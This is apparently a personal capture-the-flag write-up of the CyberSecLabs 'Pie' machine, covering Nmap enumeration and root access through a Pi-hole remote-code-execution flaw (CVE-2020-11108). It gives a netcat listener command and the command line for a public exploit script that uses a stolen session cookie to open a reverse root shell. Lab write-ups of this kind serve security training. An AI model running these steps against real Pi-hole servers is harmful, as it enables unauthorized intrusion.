CyberSecLabs- Pie
This is my 13th write up and I will be discussing my experience with the machine “Pie” from CyberSecLabs. CyberSecLabs is a great platform, for people who are starting out with penetration testing and want to sharpen their skills to take on the OSCP. Pie was fairly easy, finding a good working exploit was tough it required some trial an error. A vulnerable version of pi-hole landed me root privileges with a python exploit I found googling.
Step 1: Enumeration
I started off with an Nmap scan on this machine to see what ports/versions were exposed and decided there was no need for second scan type. It does not hurt to run two different types of Nmap scans because one scan may give you more than the other. The only time I really run a second scan is when I am not finding anything exploitable from my first results. The scan used default scripts -sC and version detection -sV.
I always start from top to bottom when reading my scan results. I did not have a ton of ports listed from this scan so I dived straight into port 80 because port 22 is usually has a trend with majority of challenges with not being the way in through a successful exploit at least from what I have noticed. In the real world always look for ways to exploit each port until you are successful.
To check out port 80 from your scan results you just visit the IP in this case I typed in http://172.31.1.26 I was presented with a Pi-Hole landing page and sure enough when looking around I see a link that brings me to the admin panel.
It is also authenticated so this is pretty gold. At this step I like to look around for any version information to find available exploits. You can usually do a view page source and search the keyword “version”.
Step 2: Exploitation
These exploits had me running around in circles but, after several google attempts I found an exploit that landed me straight into root…
From looking at the exploit it seems that the /admin/settings.php?tab=blocklists path is vulnerable to RCE. When running the script you need to gather a valid session cookie. You can do this by running developer tools in your browser under the developer tab but I went with my favorite Firefox extension cookie manager .
Now back to the exploit now that you have the session cookie there are a couple of steps to get this exploit successful.
First, Setup Netcat listener on your machine to grab the connection when running the script.
On your machine:
sudo nc -lvp 4444Then in another terminal window run:
sudo python3 root-cve-2020-11108-rce.py <your cookie here> http://172.31.1.26 <your ip here> 4444After replacing the above command with your Ip and session cookie you should now have a root shell :)
